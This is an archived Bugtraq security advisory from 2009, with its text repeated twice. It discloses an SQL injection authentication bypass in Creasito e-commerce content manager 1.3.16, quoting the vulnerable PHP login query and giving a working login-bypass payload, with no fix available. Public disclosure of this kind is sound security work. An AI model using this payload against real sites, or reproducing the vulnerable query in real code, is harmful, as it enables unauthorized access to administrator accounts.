Creasito e-commerce content manager Authentication Bypass
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <str0ke@xxxxxxxxxxx>
- Subject: Creasito e-commerce content manager Authentication Bypass
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Mon, 20 Apr 2009 17:08:20 +0200
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:date:message-id:subject :from:to:content-type; bh=gQ/biZZPPzoCTRH5K/X8fAqJr7lL6WrW4dovdWYdbNk=; b=D+GvBRTKjvuEtTHcZr49MZ0NyVQH7Av2Xi2BbDeI16c38h+YjN3opeGypwWhnrS+r5 Qm8IRzE2PfWbBBY34OG8WczSnQsai8IHbX0Q0w8AenoNYGSLy1qLwUjVEJ/DW458hEQH OC9r5QU+cSq+0jvfo1tMiUZhUl/LJAKsI85hw=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:date:message-id:subject:from:to:content-type; b=i37/F366d+VjT0o8eN+Mi+X9FsVTQKJYztdFh3HpTQxRt4yeSfRfNRr3s+VyFygAvd TdPtPnNez6Dlgs3tvsTDKKEPlwounLKs7ML3yS4h3z3Hxm8hvDuBIg6Qga9e7pvnrcj0 0DSeqKmTGfbpuHt1APrnC09x2Rg7EUmicAsF0=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
******* Salvatore "drosophila" Fresta *******
[+] Application: creasito e-commerce content manager
[+] Version: 1.3.16
[+] Website: http://creasito.bloghosteria.com
[+] Bugs: [A] Authentication Bypass
[+] Exploitation: Remote
[+] Date: 20 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
This cms is entirely vulnerable to SQL Injection.
I decided to post authentication bypass security
flaw only.
- [A] Authentication Bypass
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: admin/checkuser.php, checkuser.php
SQL Injection bug allows a guest to bypass the
authentication system. The following is the
vulnerable code:
...
$username = $_POST['username'];
...
$sql = mysql_query("SELECT * FROM amministratore WHERE
username='$username' AND password='$password' AND activated='1'");
...
*************************************************
[+] Code
- [A] Authentication Bypass
Username: -1' OR '1'='1'#
Password: foo
*************************************************
[+] Fix
No fix.
*************************************************
--
Salvatore "drosophila" Fresta
CWNP444351
******* Salvatore "drosophila" Fresta *******
[+] Application: creasito e-commerce content manager
[+] Version: 1.3.16
[+] Website: http://creasito.bloghosteria.com
[+] Bugs: [A] Authentication Bypass
[+] Exploitation: Remote
[+] Date: 20 Apr 2009
[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@xxxxxxxxx
*************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
*************************************************
[+] Bugs
This cms is entirely vulnerable to SQL Injection.
I decided to post authentication bypass security
flaw only.
- [A] Authentication Bypass
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: admin/checkuser.php, checkuser.php
SQL Injection bug allows a guest to bypass the
authentication system. The following is the
vulnerable code:
...
$username = $_POST['username'];
...
$sql = mysql_query("SELECT * FROM amministratore WHERE username='$username' AND
password='$password' AND activated='1'");
...
*************************************************
[+] Code
- [A] Authentication Bypass
Username: -1' OR '1'='1'#
Password: foo
*************************************************
[+] Fix
No fix.
*************************************************